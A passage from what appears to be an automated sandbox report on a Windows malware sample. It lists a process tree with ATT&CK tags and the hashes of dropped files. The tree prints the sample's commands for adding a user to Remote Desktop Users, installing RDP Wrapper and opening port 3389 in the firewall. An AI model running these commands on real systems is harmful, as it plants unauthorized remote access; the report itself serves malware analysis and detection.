                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                            PID:1244
                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                        • Remote Service Session Hijacking: RDP Hijacking
                                                                                                                                                                                                                                                        PID:2136
                                                                                                                                                                                                                                                        • C:\Windows\system32\net.exe
                                                                                                                                                                                                                                                          net localgroup "Remote Desktop Users" john /add
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                          • Remote Service Session Hijacking: RDP Hijacking
                                                                                                                                                                                                                                                          PID:3000
                                                                                                                                                                                                                                                          • C:\Windows\system32\net1.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add
                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                            • Remote Service Session Hijacking: RDP Hijacking
                                                                                                                                                                                                                                                            PID:704
                                                                                                                                                                                                                                                      • C:\ProgramData\RDPWinst.exe
                                                                                                                                                                                                                                                        C:\ProgramData\RDPWinst.exe -i
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                        • Server Software Component: Terminal Services DLL
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        • Modifies WinLogon
                                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                        PID:1812
                                                                                                                                                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                          netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                          PID:2868
                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                        cmd /c C:\Programdata\Install\del.bat
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:1560
                                                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                            timeout 5
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                            PID:3556
                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                      cmd /c C:\Programdata\Microsoft\temp\H.bat
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Drops file in Drivers directory
                                                                                                                                                                                                                                                      PID:3784
                                                                                                                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "-2800773014099440411073710137206817855919995624-2062962146-11896605261286767253"
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:2680
                                                                                                                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "-1696534234-948516201911170856215493701-1706813860-16620979331970302872-53253706"
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:1524
                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k NetworkService
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                        • Suspicious behavior: LoadsDriver
                                                                                                                                                                                                                                                        PID:2172
                                                                                                                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe "1432916617-13577978741747230884-1642907288128970481483798064017440257761424164715"
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:2896
                                                                                                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "-117842091115242740721757520273-527437495-141413450-14693757801383664598802988770"
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:872
                                                                                                                                                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe "9346840011809889483-1518249276-9815467491650187583-7098838617316321191582268304"
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:1580
                                                                                                                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "-5011871261640140590-15724712191505013435-562563398-1482246816-2071072190-1333052297"
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:1072
                                                                                                                                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe "1914055206-8002616291159272170-14691806951878766274162575035112014928601117259843"
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:2308
                                                                                                                                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "21434058888258039071864611907-7676308501188962312-308924385-8564472261928477300"
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:584
                                                                                                                                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "196258948413623285221432508890358329931-8667931501508268101-1881110016-1194208425"
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:348
                                                                                                                                                                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:444
                                                                                                                                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe "-9537757215727301933664073831425328416521567304-1800840125-226703556441463786"
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:596
                                                                                                                                                                                                                                                                        • C:\Windows\system32\taskeng.exe
                                                                                                                                                                                                                                                                          taskeng.exe {3322C5E1-D964-4335-A800-A0909B5A0C3F} S-1-5-21-2872745919-2748461613-2989606286-1000:CCJBVTGQ\Admin:Interactive:[1]
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:2480
                                                                                                                                                                                                                                                                            • C:\ProgramData\Windows Tasks Service\winserv.exe
                                                                                                                                                                                                                                                                              "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                              PID:2548
                                                                                                                                                                                                                                                                            • C:\ProgramData\Windows Tasks Service\winserv.exe
                                                                                                                                                                                                                                                                              "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                              PID:2952
                                                                                                                                                                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe "626413473346792333-1941364101839274079196898495953944067-996136664-535618683"
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:2520
                                                                                                                                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "-201925867917126283961627720513250755009-71130148894142602-898088205-760057445"
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:1352
                                                                                                                                                                                                                                                                              • C:\Windows\System32\spoolsv.exe
                                                                                                                                                                                                                                                                                C:\Windows\System32\spoolsv.exe
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:2996

                                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                                                • C:\ProgramData\RDPWinst.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  1.4MB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  3288c284561055044c489567fd630ac2

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  11ffeabbe42159e1365aa82463d8690c845ce7b7

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

                                                                                                                                                                                                                                                                                • C:\ProgramData\RealtekHD\2x64.dll

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  100KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  fce8f8d46ee072c54e855d2ab379feb6

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  8ab8d9c3af622fbe49c99ca52b4217e9b4b4257c

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  ce7cac2e223db3b6d1769b349c3e3a3cb83310a5776e7da471a603e287ca9510

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  c8023b9b4138e6a358b4493e83550379b2c0168a619840b43d1fb9d67c551684d2a75e7dddc831524c909ab0da3f2755eb0eb76a42ab5f6a8129143ef4f29d50

                                                                                                                                                                                                                                                                                • C:\ProgramData\RealtekHD\2x86.dll

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  83KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  e8ea8f5adb0baf2e48a484a7f7b26ce8

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  d29bc2a704f7e6d3571e53daf036b2ca3a6dd5ec

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  782bf3ec8c00a97163b2fe29594a5134849e1d30527fde599ee87032567c49f7

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  16ad5a5ec89ec302062ce6f401a2cc8eebb233403383617252703adf48ae6ad8acbbf302e72047e4664449d47e4a6a6ca8fda876f18e4a2687418493b3928032

                                                                                                                                                                                                                                                                                • C:\ProgramData\RealtekHD\GameGuard.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  5.0MB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  32198d6a8e26f4e103885fc4eef3c2d7

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  f35a0abab275eececc6410f69c5d041d14f3684e

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  fc110064f6cee1dfb6793283a7bf1964347b1e6b29a0db8efc70dd77c15c85a1

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  d25eaad411040c4b3dc8892594c717d820a0e2dc2bc10d68217a52351764691c8e1e17bc55c1e67fe550e3ffde1e01ab60e6dae8f75b5e1c182733bbc950485e

                                                                                                                                                                                                                                                                                • C:\ProgramData\RealtekHD\adfw-2.dll

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  14KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  31d696f93ec84e635c4560034340e171

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  a3037a47cc291bbf8d1ca82c353783159baf1850

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  f06d02359666b763e189402b7fbf9dfa83ba6f4da2e7d037b3f9aebefd2d5a45

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  14efe9edc58640ca78c5c8b965d2b5d70aced8b0ef2e33f5d15b0c34a7e81b00f078b193b051d671d5802228373037eb32b6ffae8d8577f9913c80952b5895de

                                                                                                                                                                                                                                                                                • C:\ProgramData\RealtekHD\adfw.dll

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  11KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  770d0caa24d964ea7c04ff5daf290f08

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  0d7894b6381c127c49f3892a862eaf37393d0355

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  c51bce247bee4a6f4cd2d7d45483b5b1d9b53f8cc0e04fb4f4221283e356959d

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  8ea364a7fe76a27037cb775b0a20f4d56b342376642f4a775de86493aad0f932a5c2960714be9545f5dd8b430cb614a2ada8152d45861b54d7206eba00552bfb

                                                                                                                                                                                                                                                                                • C:\ProgramData\RealtekHD\api-ms-win-core-file-l1-2-0.dll

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  11KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  04c39b760247c6eed86854f657833347

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  9490b9dcd3f91b06fa7f3028dc5df5b4a22d4fbc

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  f56b749c01cc82118ffe538674df22a1f4ef7a07e94e559d25f55ce104e7b095

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  5a5c9e8a1e41c4fb9aa6c0a50b60d14e4e727d951eadc3c1d475a905ea5fa5fcee8f801163206ed2a8ff651506cebcce9611afafbb3c7952ce9790f6e292e2b6

                                                                                                                                                                                                                                                                                • C:\ProgramData\RealtekHD\api-ms-win-core-file-l2-1-0.dll

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  11KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  8403e7b9ec4b0c4f6c9bf0ec93687c77

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  7581e7d872ec9c00f33bdac9690e55096db30172

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  a8b79e230a81102735996500dd00d34bfa77955c11d87c0f9c967ec85003e116

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  a1017a6115c9375ae0ee5ccc40dcf354dbe1ed3067c027c99f3d4b4045c9ad50ecb833e587579153f6b819abd27399bfe8f47bd0b898b1f1c901ab3d4a8bc146

                                                                                                                                                                                                                                                                                • C:\ProgramData\RealtekHD\api-ms-win-core-localization-l1-2-0.dll

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  13KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  2e2c78125c66cde5859559f5e6167034

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  f00e9cdd8da93106fb3bc060e64c643e2274a598

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  9bf2bff3adcb1fb5707794b18320d7113f45446dd505eee43abbf8835cd73a44

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  9bc9158284dedd0dff361b7f4ec3bf32b2915d4aeaff5a8d8ed51ccdc1e34ea5d3781343c489614eebd02323d6926a865ab94d3efd6ef6f34779364ac1752e1e

                                                                                                                                                                                                                                                                                • C:\ProgramData\RealtekHD\api-ms-win-core-processthreads-l1-1-1.dll

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  11KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  5efd5f4b617e95043898dbfd78af97fb

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  70babd7098b05c59484a9dbea77f4b5dcd2bf9cc

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  cfcefc5af3f7a37242dcdbfebedbb954a0d21d93175441bce680a1a4c1c9fef3

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  d09444a042e18655f1b994d0552db0478206dc1901557fdd9f58df5fba58654007beeedfb185f6d5958a25f287ecde84f5173c4cd34ceb8a9d507fa7f9d027be

                                                                                                                                                                                                                                                                                • C:\ProgramData\RealtekHD\rundll.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4.7MB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  4aa97db59380fb799899e534b9d79eed

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  d5b22228fc550a3fc1f69e3e838ded3f626ffeff

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  8b58e3a1a6a11225050af6c82e92451779c0315a602d19ad330e175a7c416bf6

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  811a1f32aa0991797f862902a653b9ce209418d872eb57a4b8a73eda489cc2a70848f723a8dbcd1083cb3179c56f16d6c9b9d3d3b8adfe6c49470c19946bdc1b

                                                                                                                                                                                                                                                                                • C:\ProgramData\RealtekHD\sc.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  6.8MB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  8ec5f37c04eb0932cc526d60c07af7ed

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  581bd03e37fa4078181c270b5707717426374f1a

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  10a9d5c7c46c5762259cb78c8e9eedebd338a80e9947381e6aa91c21adfdf5a3

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  a7b545aeb0e9917b8648f820c80960f0d2a64a8cd27a87a48b7f2581d70cca169cdc57a51d834a054c292e3edeee9a55f739745d901f317faa375aa79ab89f4d

                                                                                                                                                                                                                                                                                • C:\ProgramData\Setup\Game.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  49.2MB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  83cef00d7a37544a8016947ce6001bb3

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  84623db68fb824f0c080fed2d856895c5a131583

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  750353be3dcbca48295a9dd17654095f103295104c62e6b6c427d8a79f4aeffb

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  1ee3c8853382159c12c3138c6f41ee8f951a365718865f83c6a4812be26453d0a3d18ef448e01307794337eac23d580dce8e68772f3db9432f87089295e1a670

                                                                                                                                                                                                                                                                                • C:\ProgramData\Setup\IP.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  1.2MB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  5b175607d344d38dd784dccb996b656a

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  ce71176996c4559b4ef9125a16ec8a95c4ed9a75

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  836faa0fb9c1012607cd26e3ce83ab3c4b5096f8e7ddd45cabc39858c47ba263

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  f4825663d91615aeb07c13ecce1b5e43c6737fb7231c964a578bd1fdc9b3f7be2e5678ac6839116a00b0272c69cd314b46042d4c7cf948c9798c7e31009fcbb4

                                                                                                                                                                                                                                                                                • C:\ProgramData\Setup\Packs.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  31.6MB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  9ce612019b39020daa7a392bb0b77c16

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  1ca0bcbdf153fdcae5403298ce7947e7c2db535f

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  eacd24ba85bf4d318a3fb14a1686691c30f095c76f2ba743a417f816c5ea0748

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  d402be8fe68b273a8abe2859a3f4ed045a651e08f3a5e84c5ef2c39602b70706b923759fa877d43f57aba805cd4e3db5f12e0968b89636198a8fb15d57186991

                                                                                                                                                                                                                                                                                • C:\ProgramData\Setup\smss.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  6.1MB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  2018a89874c257c081b0c0e8f7799278

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  1d09d6bed866b66a0bdce381c30cd99136abb7cd

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  31f497a2901abe0935ce8849eca2deb5fe67ae31f8541282ed55d27df15c7e28

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  0ac4ecb7759f55bac286a1cb8fda439b363b1745f24976388729d21063a3d05528771c4ff5f3dfe336b9997972a351f163788bb8841a3e69d215e5691fd93430

                                                                                                                                                                                                                                                                                • C:\ProgramData\Setup\svchost.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  6.1MB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  dcbbba6b2f7cc2745787056836437bef

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  9a26fb40dca60bd58efbd4c8753d2ce7a41c2a66

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  40fe6790ad24308393c7754748d12046ea96245aff82f394ce029b222d19d8f8

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  0be1349735abf7a6abd089ee5eb46e5cd758db4b26c3216ee5c9a0026968583be3482b1d20c81f7bacb49e32f65ce50bd3db3a817c4072419c2b8de2ba090818

                                                                                                                                                                                                                                                                                • C:\ProgramData\Windows Tasks Service\settings.dat

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  483fc2e7373a9ee36cc444fca67a32a8

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  c2fe2355683b670622a8e00784bec5056291e494

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  2ee9e47fc7edee23653ee17475e0f040255aad1be11cfcec389335078561944d

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  e3b1cf539e5a542e0cab0ac9122e6027a5d489f0ac89a67070ad21ef7611010122ff2fad8d7d1d7fd6256bdb84e404a7eb8ef31bd86b0162b82c92d49af0a7e4

                                                                                                                                                                                                                                                                                • C:\ProgramData\Windows Tasks Service\winserv.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  10.2MB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  3f4f5a6cb95047fea6102bd7d2226aa9

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  fc09dd898b6e7ff546e4a7517a715928fbafc297

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  99fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688

                                                                                                                                                                                                                                                                                • C:\ProgramData\WindowsTask\AMD.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  20.7MB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  c0773382aed4ddb7605b2ee7697cc5e0

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  b55e011feb9948301f50ae38c27cfe0f427e6ac5

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  73b75d4c564848435119d3e27529e7c10aa336848f997764c3dca5a1c04e6176

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  619c20c973cc1d14fc93efb53536eec0b65aaaf09a86b991eaea20aecf3d1161f8f6a5deb6de5da1700ce38726e540456c5fb593db203af424340617530ad4d3

                                                                                                                                                                                                                                                                                • C:\ProgramData\WindowsTask\MicrosoftHost.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  6.8MB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  193fd2c0e6517867dcdf18280d9e0247

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  16e8d0f7129a702642938a8636105a9fd6335217

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  ec3a0dff84fb878c0cc552e417dadc92459c0c465447dc6b280b7c4dd28af203

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  db702e6969d1bbb3e974b7cd88d2f5c4f9cadc1974e2c384ba89faae80750024ff0560e94bf313f97f96b16e2cb7c6c5bc69c2e36ed547867ca020a4cdc3495c

                                                                                                                                                                                                                                                                                • C:\ProgramData\WindowsTask\WinRing0x64.sys

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  14KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  0c0195c48b6b8582fa6f6373032118da

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  d25340ae8e92a6d29f599fef426a2bc1b5217299

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

                                                                                                                                                                                                                                                                                • C:\ProgramData\WindowsTask\audiodg.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  6.2MB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  1067f55c24e05469d658e0db39b20a08

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  b8c37a52261259ba5b5165c9db299df54825922f

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  d97835305437f4930699b07bc744d90b2e7f0ed99b49f1ed480c6c65cd84aacf

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  9965eada652a65344afe77b22f6580acbb14d5ed11bf520a548cdc9f2598d69ce291b73789f2f0101742d8b9521f2d7a0ba12b2614cf81711e81a889cf9c5065

                                                                                                                                                                                                                                                                                • C:\ProgramData\install\del.bat

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  159B

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  49a9fec3ba20596a39e2bfae59ff4b3c

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  b9cc7369a94831b912ed85532d7cc99f32c82040

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  3a85f338cd09aefe830c7b8bac225e3d8d847b7184ecfb625ad7f46492dba681

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  e5174539967fbc5dd1a4cec7d7a868c45ff58906fd2e580ba49a82b0ff6fabfb0564678d3aca37e86f9124776d7aba6c65fa0f72219e0474adcb9dc8e7484bea

                                                                                                                                                                                                                                                                                • C:\Programdata\Microsoft\temp\H.bat

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  3KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  9128ae56efae891703071b1250a137f3

